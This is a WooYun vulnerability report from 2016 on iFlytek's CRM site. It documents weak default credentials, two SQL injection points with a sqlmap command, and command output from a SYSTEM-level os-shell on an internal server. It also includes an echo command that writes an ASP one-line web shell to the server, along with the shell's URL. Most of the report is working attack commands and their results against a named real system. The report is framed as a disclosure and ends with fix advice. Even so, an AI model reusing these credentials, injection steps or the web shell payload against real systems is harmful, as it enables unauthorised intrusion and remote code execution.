当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0189161

漏洞标题:科大讯飞某系统存在弱口令SQL注入导致Shell(可内网)

相关厂商:iflytek.com

漏洞作者: harbour_bin

提交时间:2016-03-25 23:59

修复时间:2016-05-12 14:05

公开时间:2016-05-12 14:05

漏洞类型:后台弱口令

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-25: 细节已通知厂商并且等待厂商处理中
2016-03-28: 厂商已经确认,细节仅向厂商公开
2016-04-07: 细节向核心白帽子及相关领域专家公开
2016-04-17: 细节向普通白帽子公开
2016-04-27: 细节向实习白帽子公开
2016-05-12: 细节向公众公开

简要描述:

源于一次科大讯飞的面试, 问有没有测试过你们家的网站, 所以我来了...
PS:这两个月一直忙于考试,今天我胡汉三终于回来了.

详细说明:

url:http://crm.iflytek.com/


#1 账户体系控制不严 (姓名格式为: 名+姓)

litao 88888888
lixin 88888888


进入系统

kd_crm.png


相关厂商

kd_crm1.png


仅证明
#2 两处SQL注入

crm.iflytek.com/china/resultchina.asp?sort1=1&D=mc&E=cpmc&F=htzt&G=xm&C=1&Submit422=+


注入参数: C

http://crm.iflytek.com/work/telhy.asp?ksjs=mc&ksjs2=1


注入参数: ksjs2
Sqlmap执行语句

D:\Python27>python sqlmap\sqlmap.py -u "crm.iflytek.com/china/resultchina.asp?sort1=1&D=mc&E=cpmc&F=htzt&G=xm&C=1*&Submit422=+" --cookie="ASPSESSIONIDSQRATDAQ=EKMFKFJCFBNPJLMPCGEAODJJ" -f -b --dbs --users


证明:

kd_SQL_1.png


DBA权限

kd_SQL_2.png


#3 进入os-shell, 执行命令, 服务器在内网, 可域渗透

whoami 
nt authority\system


ipconfig
Windows IP Configuration
Ethernet adapter 内网:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 172.16.75.128
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.75.254


net view /domain
Domain
-------------------------------------------------------------------------------
MYGROUP
WG
WORKGROUP
The command completed successfully.


#4 成功shell

dir d:\zbintel31.46
2014-01-21 11:45 <DIR> .
2014-01-21 11:45 <DIR> ..
2014-01-21 11:45 3 1.txt
2011-06-09 21:21 0 1.txt.bak
2011-08-17 09:35 <DIR> alt
2014-01-21 11:31 <DIR> aspnet_client
2011-08-17 09:31 <DIR> back
2011-08-17 09:31 <DIR> bank
2011-06-09 21:21 1,674 Browser.asp
2011-08-17 09:31 <DIR> caigou
2011-08-17 09:31 <DIR> caigouth
2011-08-17 09:31 <DIR> call
2011-08-17 09:31 <DIR> chance
2011-06-09 21:21 504 check.asp
2011-06-09 21:21 862 checkid.asp
2011-06-09 22:57 115 checkin.asp
2011-06-09 22:57 115 checkin2.asp
2011-08-17 09:31 <DIR> china
2011-06-09 21:21 2 chkamin.asp
2011-08-17 09:31 <DIR> contract
2011-08-17 09:31 <DIR> contractth
2011-08-18 10:01 <DIR> Copy (2) of email
2011-08-18 10:01 <DIR> Copy of email
2011-08-18 10:01 <DIR> Copy of email_sor
2011-06-09 22:57 115 Copy of index2.as
2011-08-18 10:01 <DIR> Copy of manager
2011-08-18 10:01 <DIR> Copy of sortsms
2011-07-01 19:18 561,453 creat.asp
2011-09-07 08:54 78 css.css
2011-06-09 22:57 115 default.asp
2011-08-17 09:46 <DIR> Dll
2011-08-17 09:43 <DIR> Edit
2011-08-17 09:32 <DIR> Edit1
2011-08-17 09:32 <DIR> editor_min
2011-08-18 10:00 <DIR> email
2011-08-17 09:32 <DIR> email_sort
2011-08-17 09:32 <DIR> event
2011-06-09 21:21 531 feet.htm
2011-08-17 09:32 <DIR> help
2011-08-17 09:32 <DIR> hl
2011-08-17 09:32 <DIR> hr
2011-08-17 09:32 <DIR> http
2014-01-18 15:15 <DIR> images
2011-08-17 09:32 <DIR> imageshelp
2011-08-17 09:33 <DIR> in
2011-08-17 09:33 <DIR> inc
2011-08-17 09:33 <DIR> inchelp
2011-09-07 13:42 818 index2.asp
2011-06-09 22:57 115 index22.asp
2011-09-07 08:56 816 index222.asp
2011-06-09 22:57 115 index3.asp
2011-06-09 22:57 115 index4.asp
2011-06-09 22:57 115 index5.asp
2011-06-09 22:57 115 index6.asp
2011-09-07 09:08 <DIR> js
2011-08-17 09:33 <DIR> learn
2011-08-17 09:33 <DIR> learnhd
2011-08-17 09:33 <DIR> learnimg
2011-08-17 09:33 <DIR> learntz
2011-08-17 09:33 <DIR> lend
2011-08-17 09:33 <DIR> load
2011-08-17 09:33 <DIR> load2
2011-06-09 21:21 4,759 logo_alle.gif
2011-08-17 09:33 <DIR> make
2011-08-17 09:41 <DIR> manager
2011-08-17 09:33 <DIR> Manufacture
2011-08-17 09:33 <DIR> message
2011-08-17 09:33 <DIR> moban
2011-08-17 09:33 <DIR> money
2011-08-17 09:33 <DIR> money2
2011-08-17 09:33 <DIR> money3
2011-08-17 09:33 <DIR> money4
2011-08-17 09:33 <DIR> notebook
2011-08-17 09:33 <DIR> num_sort
2011-08-17 09:33 <DIR> ocx
2011-08-17 09:33 <DIR> option
2011-08-17 09:33 <DIR> out
2011-08-17 09:33 <DIR> part
2011-08-17 09:33 <DIR> pay
2011-08-17 09:34 <DIR> person
2011-08-17 09:34 <DIR> plan
2011-08-17 09:34 <DIR> plan2
2011-08-17 09:34 <DIR> plan3
2011-08-17 09:34 <DIR> price
2011-08-17 09:34 <DIR> product
2011-08-17 09:34 <DIR> publiccla
2011-08-17 09:34 <DIR> return
2011-08-17 09:34 <DIR> search
2011-08-17 09:34 <DIR> search2
2011-08-17 09:34 <DIR> sent
2011-08-17 09:34 <DIR> service
2011-06-09 21:21 174 set1.asp
2011-08-17 09:34 <DIR> setjm
2011-06-09 21:21 2,413 setup.asp
2011-06-09 21:21 2,205 setup111.asp
2011-08-17 09:34 <DIR> smtp
2011-08-17 09:34 <DIR> sort
2011-08-17 09:34 <DIR> sort3
2011-08-17 09:34 <DIR> sort4
2011-08-17 09:34 <DIR> sort5
2011-08-17 09:34 <DIR> sortalt
2011-08-17 09:34 <DIR> sortbank
2011-08-17 09:34 <DIR> sortbz
2011-08-17 09:34 <DIR> sortcp
2011-08-17 09:34 <DIR> sortcp2
2011-08-17 09:34 <DIR> sortimg
2011-08-17 09:34 <DIR> sortjf
2011-08-17 09:34 <DIR> sortjh2
2011-08-17 09:34 <DIR> sortkc1
2011-08-17 09:34 <DIR> sortkc2
2011-08-17 09:34 <DIR> sortkh
2011-08-17 09:34 <DIR> sortpower
2011-08-17 09:34 <DIR> sortqb
2011-08-17 09:34 <DIR> sortre1
2011-08-17 09:34 <DIR> sortre2
2011-08-17 09:34 <DIR> sortset
2011-08-17 09:34 <DIR> sortsms
2011-08-17 09:34 <DIR> sortsp
2011-08-17 09:34 <DIR> sorttz
2011-08-17 09:34 <DIR> sortwages
2011-08-17 09:34 <DIR> sortwagesjj
2011-08-17 09:34 <DIR> sortwd
2011-08-17 09:34 <DIR> sortxm1
2011-08-17 09:34 <DIR> sortzs
2011-08-17 09:34 <DIR> store
2011-08-17 09:34 <DIR> test
2011-08-17 09:34 <DIR> test11
2011-08-17 09:35 <DIR> tongji
2011-08-17 09:35 <DIR> tongji3
2011-08-17 09:35 <DIR> tongxl


写wooyun1.asp

echo “<%execute(request("value"))%>”>>d:\zbintel31.46\wooyun.asp


木马文件:
http://crm.iflytek.com/wooyun1.asp

kd_Shell.png

漏洞证明:

已证明!
PS:仅测试, 未进行非法操作!

修复方案:

1、弱口令修复;
2、SQL注入过滤;
3、数据库权限设置;
4、你们更专业

版权声明:转载请注明来源 harbour_bin@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-03-28 14:05

厂商回复:

666

最新状态:

暂无


漏洞评价:

评价

  1. 2016-03-26 10:13 | qhwlpg ( 普通白帽子 | Rank:260 漏洞数:64 | http://sec.tuniu.com)

    牛逼

  2. 2016-03-26 10:30 | harbour_bin ( 普通白帽子 | Rank:569 漏洞数:68 | 好好提升自己...)

    @qhwlpg 最近在看你的关于代码审计方面的漏洞

  3. 2016-03-26 13:35 | Format_smile ( 普通白帽子 | Rank:484 漏洞数:172 | ···孰能无过,谁是谁非!)

    6666,就是这个节奏。啪啪啪,好响

  4. 2016-03-28 14:07 | 奶嘴 ( 普通白帽子 | Rank:357 漏洞数:93 | 16岁的毛孩有些厂商故意加你好友,和你聊...)

    学大牛之看我也来个科大讯飞的洞